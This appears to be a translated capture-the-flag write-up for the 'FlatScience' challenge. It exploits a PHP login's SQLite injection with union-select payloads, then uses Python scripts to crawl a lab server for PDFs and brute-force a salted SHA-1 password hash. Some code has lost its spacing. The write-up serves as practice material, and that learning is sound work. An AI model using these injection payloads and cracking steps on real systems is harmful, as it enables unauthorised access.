<?phpif(isset($_POST['usr'])&&isset($_POST['pw'])){
$user=$_POST['usr'];$pass=$_POST['pw'];$db=newSQLite3('../fancy.db');$res=$db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");if($res){
$row=$res->fetchArray();}else{
echo"<br>Some Error occourred!";}if(isset($row['id'])){
setcookie('name',' '.$row['name'],time()+60,'/');header("Location: /");die();}}if(isset($_GET['debug']))highlight_file('login.php');?>
The key two lines of code
$res=$db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");setcookie('name',' '.$row['name'],time()+60,'/');
So the queried information can be found in the cookie
Here to supplement the knowledge points of the sqlite database
Sqlite has a sqlite_master table (the global schema table stores the definitions of all tables, views, indexes, triggers, etc. in this database, and the SQL definitions of the user tables can be found
Get the Users table with id, name, password, hint fields
' union select name,password from Users--Query password
get3fab54a50e770d830c0416df817567662a9dc85c
Should be sha1($pass."Salz!")the result
Here you can be very happy to tell you that some websites can be decrypted
The direct access admin.phplogin password is ThinJerboa
This is unexpected
The expected solution is below
' union select name,hint from Users--Query hint
my fav word in my fav paper?!
So the password should be in its paper two days ago, lamenting that there is no time to practice python, the opportunity is here
Crawl all the files first
Code
import urllib.request
import requests
import re
import os
import sys
re1 ='[a-fA-F0-9]{32,32}.pdf'# 设置正则表达式匹配pdf文件
re2 ='[0-9\/]{2,2}index.html'
pdf_list =[]defget_pdf(url):global pdf_list
print(url)
req = requests.get(url).text
# 获取该页面的所有reques Response的Unicode编码内容
re_pdf = re.findall(re1,req)# 用正则表达式获取该页面中的pdf文件名称for index in re_pdf:
pdf_url=url + index
pdf_list.append(pdf_url)# 这道题狗在 还有很多pdf文件在其他页面 所以需要去访问其他页面再去获取该页面下的pdf
re_html = re.findall(re2,req)# 依次去访问所有的1/2这些页面 每次访问并获取该页面下的pdf文件for j in re_html:
new_url = url+j[0:2]# 切片 将1/index.html 只取1/print(new_url)
get_pdf(new_url)return pdf_list
defdownload(i,url):
file_name =str(i)+'.pdf'
req = requests.get(url)
f =open(r'C:\Users\lenovo\Desktop\python\buuctf做题脚本\XCTF-FlatScience\pdf\\'+file_name,'wb')
f.write(req.content)# content返回的是HTTP内容的二进制形式
f.close()print('Sucessful to download'+' '+file_name)if __name__=='__main__':
pdf_list = get_pdf('http://111.200.241.244:41641/')for i inrange(len(pdf_list)):
download(i,pdf_list[i])
Above is the code to download all pdf files
Pro-test effective
The next thing to do is this is the script of the boss
from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib
defget_pdf():return[i for i in os.listdir("./")if i.endswith("pdf")]defconvert_pdf_2_text(path):
rsrcmgr = PDFResourceManager()
retstr = StringIO()
device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
interpreter = PDFPageInterpreter(rsrcmgr, device)withopen(path,'rb')as fp:for page in PDFPage.get_pages(fp,set()):
interpreter.process_page(page)
text = retstr.getvalue()
device.close()
retstr.close()return text
deffind_password():
pdf_path = get_pdf()for i in pdf_path:print"Searching word in "+ i
pdf_text = convert_pdf_2_text(i).split(" ")for word in pdf_text:
sha1_password = hashlib.sha1(word+"Salz!").hexdigest()if sha1_password =='3fab54a50e770d830c0416df817567662a9dc85c':print"Find the password :"+ word
exit()if __name__ =="__main__":
find_password()
The result of the operation is that the password login of the admin account has a flag